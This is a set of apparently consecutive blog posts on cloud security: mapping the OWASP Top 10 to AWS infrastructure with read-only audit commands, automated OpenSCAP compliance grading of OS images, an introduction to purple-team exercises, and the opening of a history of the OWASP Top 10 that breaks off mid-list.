IMDSv2 requires a PUT request to get a session token before credentials can be retrieved — a SSRF via GET cannot retrieve IMDSv2 credentials. Enforcing IMDSv2 closes the SSRF-to-credentials path.

# Check all EC2 instances for IMDSv1 (HttpTokens != "required" means vulnerable)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    ID:InstanceId,
    Name:Tags[?Key==`Name`]|[0].Value,
    IMDSv2:MetadataOptions.HttpTokens,
    State:State.Name
  }' \
  --output table

# Enforce IMDSv2 on a specific instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-endpoint enabled

The Series Attack Map: Which Episodes Cover Which Categories

OWASP Category Purple Team Episode
A01 Broken Access Control EP04: Broken access control in AWS
A02 Cryptographic Failures EP06 (partial): CI/CD secrets exposure
A03 Injection EP07: SSRF to cloud metadata
A04 Insecure Design EP08: Kubernetes container escape
A05 Security Misconfiguration EP08: Kubernetes container escape
A06 Vulnerable Components EP09: Supply chain attacks
A07 Authentication Failures EP05: MFA fatigue attacks
A08 SW/Data Integrity EP06: CI/CD secrets exposure, EP09: Supply chain
A09 Logging/Monitoring Failures EP11: Detection engineering with eBPF
A10 SSRF EP07: SSRF to cloud metadata

Run This in Your Own Environment: OWASP Coverage Self-Assessment

Run this against your AWS account and record the results as your OWASP A01–A10 baseline before the EP04 exercise:

#!/bin/bash
# Purple Team EP02 — OWASP Cloud Coverage Check
# Run in an account with read-only IAM permissions

echo "=== A01: Broken Access Control ==="
echo "--- S3 public access block status ---"
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) 2>/dev/null || \
  echo "WARN: Account-level public access block not set"

echo ""
echo "=== A02: Cryptographic Failures ==="
echo "--- EBS default encryption ---"
aws ec2 get-ebs-encryption-by-default --query 'EbsEncryptionByDefault' --output text

echo ""
echo "=== A05: Security Misconfiguration ==="
echo "--- GuardDuty status in current region ---"
aws guardduty list-detectors --query 'DetectorIds' --output text || echo "DISABLED"

echo ""
echo "=== A07: Authentication Failures ==="
echo "--- IAM users without MFA ---"
aws iam generate-credential-report 2>/dev/null
sleep 3
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "NO MFA: "$1}'

echo ""
echo "=== A09: Logging/Monitoring Failures ==="
echo "--- CloudTrail multi-region trail ---"
aws cloudtrail describe-trails --query 'trailList[?IsMultiRegionTrail==`true`].Name' --output text || \
  echo "WARN: No multi-region trail"

echo ""
echo "=== A10: SSRF ==="
echo "--- EC2 instances with IMDSv1 enabled ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,IMDS:MetadataOptions.HttpTokens}' \
  --output table

⚠ Common Mistakes When Mapping OWASP to Infrastructure

Treating it as a checklist, not a threat model. OWASP categories are not yes/no checkboxes. “Is broken access control present?” is not a question with a binary answer. The question is: which resources are accessible to which principals, and is that access correct given the intended design?

Ignoring A09 (Logging/Monitoring) until the breach. The first nine categories are about preventing or limiting the attack. A09 is about knowing it happened. Without A09 controls, you will not know you were breached until a third party tells you.

Fixing web-layer controls and ignoring the infrastructure equivalents. An organization that scores well on OWASP in their web application pen test may still have public S3 buckets, IMDSv1 enabled everywhere, and no CloudTrail in us-west-1. The mapping in this episode applies to infrastructure — run it separately from your application security assessments.

Conflating A06 (Vulnerable Components) with just “patch management.” XZ Utils was fully patched in the affected timeframe — the malicious version was the latest release. A06 in the supply chain context is about verifying the integrity of what you install, not just its version number.


Quick Reference

OWASP Cloud Infrastructure Equivalent Detection Tool
A01 IAM wildcards, public S3, broad trust policies AWS Config, CloudTrail
A02 Plaintext secrets in env vars, unencrypted S3 TruffleHog, Macie
A03 SSRF, Log4j JNDI injection WAF logs, CloudTrail IMDS calls
A04 Privileged containers, no seccomp OPA/Gatekeeper, Falco
A05 K8s RBAC defaults, open etcd, open SGs kube-bench, AWS Config
A06 Unpatched base images, transitive CVEs, supply chain Trivy, Grype, SLSA
A07 MFA fatigue, long-lived sessions, stolen tokens GuardDuty, Okta logs
A08 Unsigned images, mutable CI references, build compromise Cosign, SLSA, OIDC
A09 No CloudTrail, no GuardDuty, no runtime telemetry AWS Security Hub
A10 IMDSv1 on EC2, SSRF to internal endpoints VPC Flow Logs, CloudTrail

Key Takeaways

  • OWASP Top 10 is a threat taxonomy — every category has a cloud, Kubernetes, or Linux infrastructure equivalent
  • A01 (Broken Access Control) is the most common cloud failure: IAM wildcards, public S3, and overly broad trust policies
  • A10 (SSRF) is what enabled the Capital One breach — IMDSv1 on EC2 makes any SSRF a credential theft path
  • A08 (Software/Data Integrity) is the SolarWinds attack class — supply chain compromise of the build pipeline itself
  • A09 (Logging/Monitoring) is the category that turns the other nine from “detectable breach” into “11-day dwell time”
  • Fixing A01–A08 without A09 means you improve your controls but still won’t know when they’re bypassed
  • Run the OWASP coverage self-assessment above and record your baseline before starting the episode exercises

What’s Next

EP03 is the breach landscape: six major incidents from December 2020 (SolarWinds) through April 2024 (XZ Utils). Each one maps to the OWASP categories from this episode. The pattern across all six is three root causes — identity, supply chain, misconfiguration — and understanding that pattern tells you where to spend your next purple team exercise. The cloud security breaches from 2020 to 2025 are the empirical record this series is built on.

Get EP03 in your inbox when it publishes → subscribe at linuxcent.com

Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment

Reading Time: 6 minutes

OS Hardening as Code, Episode 4
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance**


TL;DR

  • “We use CIS L1” means nothing without a verified grade — automated OpenSCAP compliance provides one before any instance is deployed
  • Stratum runs OpenSCAP after every build and attaches the grade to the image metadata: cis-l1-A-98
  • Grades are A through F based on percentage of controls passing, with explicit accounting for documented overrides
  • SARIF output is machine-readable — importable directly into GitHub Advanced Security, Jira, or any SIEM
  • Drift detection: rescan any running instance against the original blueprint and see exactly which controls changed since the image was built
  • An image that scores below your minimum grade threshold doesn’t get snapshotted — it doesn’t exist

The Problem: A Grade That’s Never Been Verified Is Not a Grade

Security audit request:
"Provide CIS L1 compliance evidence for all production instances"

Team response:
  Instance A: "CIS L1 hardened" — OpenSCAP last run: 4 months ago
  Instance B: "CIS L1 hardened" — OpenSCAP last run: never
  Instance C: "CIS L1 hardened" — OpenSCAP version: 1.2 (current: 1.3.8)
  Instance D: "CIS L1 hardened" — manual scan output: "87% passing"
  Instance E: "CIS L1 hardened" — manual scan output: "91% passing"

"Which profile was used for D and E? Are they comparable?"
"Were they scanned before or after a recent kernel update?"
"Why is C running an old OpenSCAP version?"

Automated OpenSCAP compliance means the grade is generated the same way, on every image, every time, before the image is ever deployed.

EP03 showed that the same HardeningBlueprint YAML builds consistent OS images across six cloud providers. What it left open is the question every auditor eventually asks: how do you know the Ansible hardening actually did what you think it did? Running Ansible-Lockdown successfully means the tasks ran. It does not mean every CIS control is satisfied — some controls can’t be applied by Ansible alone, some require manual verification, and some interact with the environment in unexpected ways.


A compliance team requested CIS L2 evidence for a SOC 2 Type II audit. The security team had been running OpenSCAP scans — but manually, on-demand, using slightly different profiles across teams, with no standard for how to store or compare results.

The audit found four problems:
1. Two instances had been scanned with CIS L1, not L2, despite being labeled “CIS L2”
2. Three instances hadn’t been scanned in over six months
3. The scan outputs from different teams were in different formats (HTML vs XML vs text)
4. Two instances showed “91% passing” and “89% passing” — with no documentation of whether those were acceptable thresholds or what the failing controls were

The audit took two weeks to resolve. The finding wasn’t a security failure — it was a documentation and process failure. But it consumed two weeks of engineering time and appeared in the audit report as a gap.

The root cause: compliance scanning was a manual step that produced inconsistent output in an inconsistent format.


How Automated OpenSCAP Compliance Works

Every Stratum build ends with an automated OpenSCAP scan:

stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws
      │
      ├─ Provisions build instance
      │
      ├─ Runs Ansible-Lockdown (144 tasks)
      │
      ├─ Runs post-build OpenSCAP scan
      │    ├── Profile: CIS Ubuntu 22.04 L1 (from blueprint)
      │    ├── OpenSCAP version: pinned in blueprint (default: latest)
      │    └── 100 controls checked
      │
      ├─ Calculates grade
      │    ├── Passing:   92 controls
      │    ├── Failing:   6 controls
      │    ├── Overrides: 2 (documented in blueprint)
      │    └── Grade: A (94/100 effective, 98% pass rate)
      │
      ├─ Writes to image metadata:
      │    compliance_grade=cis-l1-A-94
      │    compliance_scan_date=2026-04-19
      │    [email protected]
      │
      └─ Snapshots AMI (or fails if grade < min_grade)

The grade is written into the AMI (or GCP/Azure image) metadata at creation time. It travels with the image. Any instance launched from this AMI carries the provenance of what was applied and what grade was achieved.


The A-F Grade Calculation

The grade is not a simple percentage. It accounts for documented overrides and applies a threshold-based letter scale:

Total CIS controls:    100
Passing:               92
Failing:               6 (genuine failures)
Overrides (compliant): 2 (documented in blueprint, counted as passing)

Effective passing:     94 / 100
Grade:                 A

Grade thresholds (configurable per blueprint):

Grade Default threshold Meaning
A ≥ 95% effective Production-ready, minimal exceptions
B 85–94% Acceptable with documented exceptions
C 70–84% Below standard — deploy with caution
D 55–69% Significant gaps — do not deploy to production
F < 55% Hardening failed — image not snapshotted

The thresholds are configurable in the blueprint:

compliance:
  benchmark: cis-l1
  controls: all
  min_grade: B          # Build fails if grade < B
  grade_thresholds:
    A: 95
    B: 85
    C: 70
    D: 55

If the build produces a grade below min_grade, the instance is terminated and no image is created. The failure is logged with the full list of controls that blocked the grade.


Reading the Scan Output

# Show the last build's scan results
stratum scan --show-last --blueprint ubuntu22-cis-l1.yaml

# Output:
# Build: ubuntu22-cis-l1 @ 2026-04-19T15:42:01Z
# Provider: aws (ap-south-1)
# Grade: A (94/100 effective controls)
#
# Passing controls: 92
# Failing controls: 6
# ──────────────────────────────────────────────
# FAIL  1.1.7   Ensure separate partition for /var/log/audit
#       Reason: tmpfs used — separate block device not configured
#       Remediation: Add /var/log/audit to separate EBS volume
#
# FAIL  1.6.1.3 Ensure AppArmor is enabled in bootloader config
#       Reason: GRUB_CMDLINE_LINUX missing apparmor=1 security=apparmor
#       Remediation: Update /etc/default/grub, run update-grub, reboot
#
# FAIL  3.1.1   Ensure IPv6 is disabled if not needed
#       Reason: net.ipv6.conf.all.disable_ipv6=0
#       Remediation: Set in /etc/sysctl.d/60-kernel-hardening.conf
# ...
#
# Overrides (compliant): 2
# ──────────────────────────────────────────────
# OVERRIDE  1.1.2   tmpfs /tmp via systemd unit — equivalent control
# OVERRIDE  5.2.4   SSH timeout managed by session manager policy

The failing controls tell you exactly what to fix and how to fix it. This is the difference between “87% passing” as a number and “87% passing” as an actionable gap list.


SARIF Export

Every scan produces a SARIF (Static Analysis Results Interchange Format) file:

# Export scan results to SARIF
stratum scan \
  --instance i-0abc123 \
  --benchmark cis-l1 \
  --output sarif \
  --out-file scan-results/i-0abc123-cis-l1.sarif

SARIF is the standard format for security scan results. It’s directly importable into:

  • GitHub Advanced Security — upload via actions/upload-sarif, results appear in the Security tab
  • Jira — import as security findings, linked to the image or instance ID
  • Splunk / SIEM — structured JSON, parseable as events
  • AWS Security Hub — importable as findings via the Security Hub API

For audit purposes, the SARIF file is the evidence artifact. It contains the full scan profile, every control result, the OpenSCAP version, the scan timestamp, and the machine it was run against.

# Upload to GitHub Advanced Security
stratum scan \
  --instance i-0abc123 \
  --benchmark cis-l1 \
  --output sarif \
  --github-upload \
  --github-ref $GITHUB_REF \
  --github-sha $GITHUB_SHA

Drift Detection

The grade at build time is the baseline. Any instance can be rescanned against the blueprint that built it:

# Rescan a running instance
stratum scan --instance i-0abc123 --blueprint ubuntu22-cis-l1.yaml

# Output:
# Instance: i-0abc123 (launched from ami-0a7f3c9e82d1b4c05)
# Original grade (build):  A (94/100) — 2026-01-15
# Current grade (rescan):  B (87/100) — 2026-04-19
#
# Drifted controls (7):
#   3.3.2  TCP SYN cookies: FAIL — net.ipv4.tcp_syncookies=0
#           Last passing: 2026-01-15 (build)
#           Current value: 0 (expected: 1)
#
#   5.3.2  sudo log_input: FAIL — rule removed from /etc/sudoers.d/
#           Last passing: 2026-01-15 (build)
#           Current value: [rule absent] (expected: Defaults log_input)

Drift detection is how you find the instances that were “temporarily” modified and never reverted. The scan compares the current state against the baseline — not against a generic CIS profile, but against the specific blueprint version that built the image.


Scanning Without a Build: Assessing Existing Instances

For instances not built with Stratum, you can run a standalone scan:

# Assess an existing instance against CIS L1
stratum scan --instance i-0legacy123 --benchmark cis-l1

# No blueprint comparison — just the raw CIS grade
# Output:
# Grade: C (72/100)
# 28 controls failing
# ...

This is useful for assessing the state of instances built before Stratum was in use, or for comparing a manual hardening approach against the benchmark.


What Controls Typically Block an A Grade

For Ubuntu 22.04 CIS L1 builds in most cloud environments, these are the controls that most commonly prevent an A grade:

Control Why it often fails Fix
1.1.7 /var/log/audit separate partition Cloud images don’t have separate volumes at build time Add EBS volume, configure at launch
1.6.1 AppArmor bootloader config GRUB parameters not set correctly Update /etc/default/grub, run update-grub
3.1.1 Disable IPv6 Cloud networking sometimes requires IPv6 Override with documented reason if intentional
5.2.21 SSH MaxStartups Default sshd_config not updated Add MaxStartups 10:30:60 to sshd_config
6.1.10 World-writable files Some package installations leave world-writable files Post-install cleanup in Ansible role

The first two (separate audit partition, AppArmor bootloader) are the most common A→B blockers and often require architecture decisions about how volumes are provisioned at launch versus build time.


Key Takeaways

  • Automated OpenSCAP compliance means every image has a verified, reproducible grade generated by the same scanner with the same profile, before it’s ever deployed
  • The A-F grade accounts for documented overrides from the blueprint — the failing controls in the output are genuine gaps, not known exceptions
  • SARIF export makes scan results importable into GitHub Advanced Security, Jira, SIEM, and audit tooling
  • Drift detection catches configuration changes that happen after the image is deployed — the grade at build time is the baseline
  • Images that score below min_grade don’t get snapshotted — the failed build tells you exactly which controls to fix

What’s Next

Automated OpenSCAP compliance gives every image a verified grade before deployment. What EP04 left open is what happens after the grade is known — specifically, what prevents an engineer from deploying a C-grade image to production “just this once.”

The Pipeline API is the answer. EP05 covers the CI/CD compliance gate: POST /api/pipeline/scan fails the build if the image grade is below threshold. The unhardened image never reaches production — not because engineers are disciplined, but because the pipeline won’t let it through.

Next: CI/CD compliance gate — block unhardened images before they reach production

Get EP05 in your inbox when it publishes → linuxcent.com/subscribe

What Is Purple Team Security: Red + Blue = Better Defense

Reading Time: 8 minutes

What Is Purple Team SecurityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025


TL;DR

  • Purple team security is the practice of combining offensive (red) and defensive (blue) work in the same exercise — attackers simulate real techniques while defenders tune detection in real time
  • Traditional red team engagements produce a report; purple team produces a faster MTTD (mean time to detect)
  • The structural output is not a findings list — it’s updated detection rules, tested playbooks, and a measured detection baseline
  • Purple team is not a permanent headcount; it is a cadence of exercises run against your own infrastructure
  • Every episode in this series follows the red-blue-purple model: attack simulation → detection → structural fix

OWASP Mapping: This episode establishes the series methodology. No single OWASP category. Subsequent episodes map directly to A01 through A10.


The Big Picture

┌─────────────────────────────────────────────────────────────────┐
│                    PURPLE TEAM MODEL                            │
│                                                                 │
│   RED TEAM                    BLUE TEAM                         │
│   (Offensive)                 (Defensive)                       │
│                                                                 │
│   ┌──────────┐               ┌──────────┐                       │
│   │ Simulate │──── attack ──▶│  Detect  │                       │
│   │ attack   │               │  alert   │                       │
│   └──────────┘               └──────────┘                       │
│         │                          │                            │
│         └──────────┬───────────────┘                            │
│                    │                                            │
│              ┌─────▼──────┐                                     │
│              │  DEBRIEF   │  ← The purple layer                 │
│              │ What fired?│                                      │
│              │ What didn't│                                      │
│              │ Why?       │                                      │
│              └─────┬──────┘                                     │
│                    │                                            │
│         ┌──────────▼──────────┐                                 │
│         │  Updated detection  │                                 │
│         │  rules + playbooks  │                                 │
│         └─────────────────────┘                                 │
│                                                                 │
│   OUTCOME: Detection time drops exercise-over-exercise          │
└─────────────────────────────────────────────────────────────────┘

What is purple team security? It is the structured practice of attacking your own infrastructure — with full visibility on both sides — so that detection logic improves after every exercise, not just after a real breach.


Why Red vs. Blue Alone Fails

Eleven days.

That was how long an attacker had access before my blue team detected the compromise in a red team engagement I ran two years ago. It was a standard authorized engagement — well-scoped, realistic techniques, no shortcuts. The red team was good. The blue team was experienced. And still: eleven days.

The debrief was the turning point. The red team had used techniques that generated logs — CloudTrail entries, VPC Flow Log anomalies, process spawn events. The blue team had the data. The detections just weren’t tuned for these specific patterns. Nobody had ever run the techniques against this specific environment and verified whether the alerts fired.

We restructured the next exercise as a purple team exercise. Same attacker techniques. But this time, the blue team was in the room with the red team. They watched each technique execute in real time. They checked whether the alert fired. When it didn’t, they wrote the detection rule on the spot and verified it before moving to the next technique.

Detection time in the following exercise: four hours.

That is the entire argument for purple team security. Not philosophy. Not org charts. Eleven days versus four hours.


What Red Team Alone Gets Wrong

Traditional red team engagements produce a report with findings. The findings describe what the attacker did. The recommendations describe what to fix. Then the report goes to a remediation queue, the org closes the tickets over three months, and the detection logic is never tested.

The fundamental problem: a red team report tells you what happened; it doesn’t tell you whether your detection would catch it happening again.

The MITRE ATT&CK framework lists over 400 techniques. An annual red team engagement tests maybe 20 of them against your environment. You get a PDF. You don’t get a detection baseline.

Red team alone also creates adversarial dynamics inside the organization. Red team wins when they’re not caught. Blue team wins when they catch everything. These goals are structurally opposed, which means neither team has an incentive to share information that would help the other.


What Blue Team Alone Gets Wrong

Blue team without red team input is writing detection rules in the abstract. They tune alerts based on what they think an attacker would do, not what an attacker actually does against your specific environment with your specific tooling.

Signature-based detection catches known-bad. Behavioral detection catches anomalies. Neither catches a sophisticated attacker who has studied your baseline — unless you’ve explicitly tested whether the behavior that attacker uses registers as an anomaly in your environment.

Blue teams also tend toward alert fatigue. When everything fires, nothing gets investigated. Tuning requires knowing which signals correspond to real techniques, and that knowledge only comes from running the techniques.


The Purple Team Model: How It Actually Works

Purple team security is not a permanent team structure. You don’t hire a purple team. You run purple team exercises.

The exercise structure:

1. SCOPE          — agree on the attack scenario (e.g., "compromised developer credentials")
2. RED EXECUTES   — red team runs the first technique in the scenario
3. BLUE OBSERVES  — blue team watches for the alert; records: fired / not fired / noisy
4. DEBRIEF        — immediate, technique by technique. Why didn't it fire? What data existed?
5. TUNE           — blue team updates detection rule. Red team re-runs. Verify it fires.
6. NEXT TECHNIQUE — repeat for every technique in the scenario
7. MEASURE        — record detection rate and detection time at the end of the exercise

The output of a purple team exercise is not a PDF. It is:
– Updated detection rules (tested and verified)
– A measured detection time for each technique
– A documented attack scenario with the specific commands used
– A baseline for the next exercise to beat

This is what “purple” means: the red and blue work together, in the same room or on the same call, producing improved defense as a direct output of the attack simulation.


The MITRE ATT&CK Scaffolding

Every purple team exercise is anchored to ATT&CK techniques. ATT&CK provides the shared vocabulary: red team uses technique T1078 (Valid Accounts), blue team knows which data sources detect T1078, and the exercise verifies whether those detections are actually implemented and tuned.

MITRE ATT&CK Technique
         │
         ├── Tactic: Initial Access / Persistence / Lateral Movement / ...
         ├── Data Sources: CloudTrail, Process events, Network traffic, ...
         ├── Detection: What behavioral indicator to look for
         └── Mitigations: What configuration change prevents or limits it

When you scope a purple team exercise using ATT&CK, you get explicit coverage tracking. After six exercises, you can report: “We have verified detections for 47 of the 112 techniques most relevant to our threat model. These 65 are not yet covered.”

That is a measurable security posture improvement. It is auditable. It is repeatable.


Where OWASP Fits in This Series

This series uses OWASP Top 10 (2021) as the threat taxonomy, not ATT&CK. The reason: OWASP Top 10 maps directly to the classes of vulnerability that caused the major breaches between 2020 and 2025 — and it is familiar to the developers and architects who need to remediate them.

The next episode maps every OWASP Top 10 category to its cloud and Kubernetes infrastructure equivalent. Most engineers think OWASP applies only to web applications. It doesn’t. Broken Access Control (A01) is the S3 bucket that’s public when it shouldn’t be. Cryptographic Failures (A02) is the environment variable with a plaintext database password committed to GitHub. Injection (A03) is the SSRF that hits the EC2 metadata endpoint.

The framing shifts. The categories don’t.


Red Phase Primer: How Attack Simulations Work in This Series

Every episode from EP04 onward follows this structure:

Red phase — the technique the attacker uses, with the actual commands. Not “the attacker exploited misconfigured IAM.” The actual aws CLI command or kubectl invocation that demonstrates the technique. Commands are safe for authorized use in your own environment or a test account.

Blue phase — what detection looks like. The CloudTrail event, the GuardDuty finding, the Falco rule, the SIEM query. If it doesn’t fire by default, the episode says so explicitly — and shows you how to make it fire.

Purple phase — the structural fix. Not “train your developers to be more careful.” The IAM policy, the SCPs, the network control, the pre-commit hook. The thing that makes the vulnerability not exist, not the thing that makes humans try harder to avoid it.


Run This in Your Own Environment: Baseline Your Current Detection Coverage

Before EP02, establish a detection baseline. This tells you where you start, so later exercises have a number to beat.

aws guardduty list-findings \
  --detector-id $(aws guardduty list-detectors --query 'DetectorIds[0]' --output text) \
  --finding-criteria '{
    "Criterion": {
      "updatedAt": {
        "GreaterThanOrEqual": '$(date -d '30 days ago' +%s000)'
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 50 aws guardduty get-findings \
    --detector-id $(aws guardduty list-detectors --query 'DetectorIds[0]' --output text) \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, severity: .Severity, count: 1}' | \
  jq -s 'group_by(.type) | map({type: .[0].type, count: length})'
# Check if CloudTrail is enabled and logging management events
aws cloudtrail describe-trails --query 'trailList[].{Name:Name,MultiRegion:IsMultiRegionTrail,LoggingEnabled:HasCustomEventSelectors}' --output table
# Check if S3 server access logging is enabled on all buckets
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    logging=$(aws s3api get-bucket-logging --bucket "$bucket" 2>/dev/null)
    if [ -z "$logging" ] || echo "$logging" | grep -q '{}'; then
      echo "NO LOGGING: $bucket"
    else
      echo "LOGGING OK: $bucket"
    fi
  done

Record your current findings count by category and the number of buckets without logging. These are your pre-exercise baselines.


⚠ Common Mistakes When Starting a Purple Team Practice

Running it as an annual event. One purple team exercise per year produces a report. Monthly exercises with 3–5 techniques each produce measurable improvement in detection time. Frequency is the variable.

Letting red and blue work in separate rooms. The purple layer is the debrief. If red sends a report and blue reads it later, you’ve just done a red team engagement. The real-time shared observation is what generates the immediate detection improvement.

Measuring success as “how many vulnerabilities were found.” The right metric is detection time per technique and detection coverage across your ATT&CK or OWASP matrix. Vulnerabilities found is an output of the exercise; faster detection is the outcome.

Starting with sophisticated techniques. The first exercise should test basics: credential access, S3 enumeration, IAM privilege escalation attempts. These generate straightforward logs in CloudTrail. If your detection doesn’t catch these, it won’t catch the sophisticated stuff either. Start where the coverage gaps are most embarrassing.

No documentation of the exercise environment state. If you tune a detection rule during an exercise and then a Terraform change overwrites the policy, you’ve lost the improvement. All detection changes from exercises go through version control immediately.


Quick Reference

Term Definition
Purple team security Practice of combined red/blue exercises where both teams improve detection together
MTTD Mean Time to Detect — the primary metric purple team exercises reduce
ATT&CK MITRE framework mapping adversary techniques to data sources and detections
Red phase Attacker perspective: simulate the technique with real commands
Blue phase Defender perspective: what detection fires (or doesn’t)
Purple phase The joint debrief and immediate detection tuning that makes both better
Detection baseline Measured MTTD and technique coverage before the first exercise
OWASP Top 10 Threat taxonomy used in this series — applies to infrastructure, not just web apps

Key Takeaways

  • Purple team security is a practice, not a team: structured exercises where red attacks and blue detects in real time, with joint debrief producing updated detection rules
  • The metric that matters is detection time per technique — not findings count
  • Red team alone produces a report; purple team produces a faster MTTD and tested detection coverage
  • MITRE ATT&CK provides the technique vocabulary; OWASP Top 10 provides the vulnerability taxonomy this series uses
  • Every major cloud breach 2020–2025 maps to an OWASP category — those categories are the exercise backlog for any cloud-running organization
  • Detection improvements from exercises must be version-controlled immediately or they disappear with the next infrastructure change
  • Frequency of exercises is the primary driver of improvement — monthly beats annual by an order of magnitude

What’s Next

EP02 maps every OWASP Top 10 category to its cloud infrastructure equivalent. Most engineers treat OWASP as a web application concern. The cloud security breaches from 2020 to 2025 tell a different story: the S3 bucket that became public is A01; the CI/CD pipeline secret is A08; the SSRF to EC2 metadata is A10. The taxonomy was always infrastructure-applicable. EP02 makes that mapping explicit — with the cloud-native equivalent, the real breach that demonstrates it, and the detection query to run.

Get EP02 in your inbox when it publishes → subscribe at linuxcent.com

OWASP Top 10 History: How the List Evolved from 2003 to 2025

Reading Time: 8 minutes


series: OWASP LLM Top 10: From Web Roots to AI Frontiers
episode: 1 of 22
status: Draft
slug: /owasp-top-10-history-evolution/
focus_keyphrase: OWASP Top 10 history evolution
search_intent: Informational
meta_description: “OWASP Top 10 history: how the list evolved from SQL injection in 2003 to LLM prompt injection in 2025 — and what stayed constant across every version.”
owasp_mapping: “Foundation episode — establishes the OWASP organization, methodology, and six-version evolution before branching to the four lists that exist today (Web App, API, Cloud-Native, LLM).”


OWASP Top 10 HistoryThe Four OWASP ListsWhy Classic OWASP Breaks for LLMsOWASP LLM Top 10 2025


TL;DR

  • OWASP Top 10 history evolution spans six published versions from 2003 to 2021 — the category names change every cycle; the underlying failure classes do not
  • Injection, broken authentication, and access control have appeared in every single version under different names; they were exploited in 2003 and they are still the top breach vectors in 2025
  • The 2021 edition abstracted away from web-app-specific language into attack classes — which is what made OWASP applicable to cloud infrastructure, APIs, Kubernetes, and ultimately AI systems
  • OWASP is not a compliance standard; it is a community consensus on risk — but in 2025, the EU AI Act began directly citing the OWASP AI Exchange, which changes that calculus
  • Four distinct OWASP Top 10 lists exist today: Web App (2021), API Security (2023), Cloud-Native App Security, and LLM Applications (2025) — this series covers the last one, built on the foundation of the first

OWASP Mapping: Foundation episode. No single OWASP LLM category. This episode traces the lineage from OWASP Top 10 (2003) through all six web app versions to the four lists that exist in 2025. Every subsequent episode maps directly to one or more OWASP LLM Top 10 (2025) categories.


The Big Picture

OWASP TOP 10 EVOLUTION: 2003 → 2025

2003 ──▶ Web-era injection (SQL, XSS, parameter tampering)
          │  HTTP/1.0 apps. Databases directly exposed via
          │  dynamic SQL. Sessions via URL parameters.
          │
2007 ──▶ Session management + insecure comms elevated
          │  HTTPS adoption slow. Cookie theft common.
          │
2010 ──▶ Unvalidated redirects added. XSS re-ranked.
          │  The list reflects what's being actively exploited.
          │
2013 ──▶ CSRF dropped. Missing Function-Level Access added.
          │  First signs of API/microservice thinking.
          │
2017 ──▶ Risk-weighted ranking. CWE mappings. XXE added.
          │  Insecure Deserialization, Logging failures enter.
          │  The list becomes infrastructure-aware.
          │
2021 ──▶ Abstracted to attack classes. Insecure Design +
          │  SSRF added. Infrastructure/cloud applicability.
          │  ┌──────────────────────────────┐
          │  │ Now maps to cloud infra      │ ← Purple Team EP02
          │  │ Kubernetes, APIs, pipelines  │
          │  └──────────────────────────────┘
          │
          ├──▶ API Security Top 10 (2023)
          │     REST/GraphQL-specific risks
          │
          ├──▶ Cloud-Native App Security Top 10
          │     Containers, orchestration
          │
          └──▶ LLM Applications Top 10 (2023 v1 → 2025 v2)
                Prompt injection, model poisoning, RAG attacks
                ← THIS SERIES

OWASP Top 10 history is not a list of bugs. It is a snapshot of where the application surface was — and where attackers found the seams — taken every three to four years.


The 2003 Founding: What the Web Looked Like

The OWASP Foundation was established in 2001. The first Top 10 list shipped in 2003.

The web in 2003 looked nothing like it does now. Applications were monolithic. Databases were directly queried via dynamic SQL strings concatenated from user input. Authentication was session cookies stored in URL parameters. “Security” was a firewall at the network perimeter — if you were inside the network, you were trusted.

SQL injection was not a theoretical risk. It was how attackers exfiltrated data in bulk, every day, at scale. The same for XSS: inject JavaScript into a page, steal session cookies, impersonate users. These were not edge cases — they were the primary breach vectors because the web was built without any assumption that input was untrusted.

The OWASP founding premise: developers build these vulnerabilities not because they are negligent, but because the threat model was never taught. The Top 10 list was documentation, not enforcement — a shared vocabulary for what actually causes breaches.


Version-by-Version: What Changed and What Did Not

Year Most Significant Addition What Dropped / Changed What It Reflects
2003 Unvalidated Input, SQL Injection, XSS, Command Injection Dynamic SQL era; input treated as trusted
2007 CSRF, Insecure Comms, Improper Error Handling Unvalidated Input consolidated HTTPS adoption gap; session theft via network
2010 Unvalidated Redirects + Forwards CSRF de-emphasized Open redirectors weaponized for phishing
2013 CSRF dropped; Missing Function-Level Access Insecure Storage removed API-style thinking entering the list
2017 Insecure Deserialization, Logging + Monitoring Failures, XXE Unvalidated Redirects dropped Server-side attack complexity; blind spots in detection
2021 Insecure Design (new class), SSRF XSS merged under Injection Architecture-level risk; abstract attack classes introduced

The column that doesn’t change: Broken Access Control, Injection, and Authentication Failures have appeared in every version. The names shift (A01 becomes A07 becomes A01 again). The category descriptions evolve. The underlying failure — you can access things you shouldn’t, or execute code you shouldn’t, or authenticate as someone you’re not — never leaves the list.

This is the most important observation in the entire series: OWASP’s vocabulary modernizes; the failure classes are constants. When you see LLM01 Prompt Injection in the 2025 LLM list, you are looking at the same failure class as A03 Injection in the web app list. The attack surface changed. The category did not.


What the 2021 Abstraction Unlocked

The 2017 → 2021 transition was architecturally significant. Prior versions were implicitly scoped to HTTP requests against web applications. The 2021 list made a deliberate choice to describe attack classes rather than attack techniques.

“Injection” in 2021 means: untrusted data is sent to an interpreter and executed as code or commands. That definition covers SQL injection, LDAP injection, OS command injection — and, it turns out, natural language prompt injection in LLMs. The definition doesn’t care what the interpreter is.

“Broken Access Control” in 2021 means: a principal can act on a resource or perform an action it was not intended to. That covers misconfigured S3 buckets, Kubernetes RBAC gaps — and an LLM agent with tool access that hasn’t been scoped to least capability.

This abstraction is why OWASP became applicable to cloud infrastructure, APIs, containers, and AI. It’s also why the Purple Team series (specifically EP02) was able to map the entire 2021 list directly to cloud infrastructure attack paths — and why this series can map the same abstraction to LLM attack surfaces.

For the cloud infrastructure angle, see OWASP Top 10 mapped to cloud infrastructure. This series starts where that one ends: the attack surface that cloud infrastructure runs on is increasingly powered by language models.


The Four Lists That Exist Today

OWASP has expanded beyond the original web app list. Four Top 10 lists are actively maintained as of 2025:

OWASP Top 10 — Web Application Security Risks (2021)
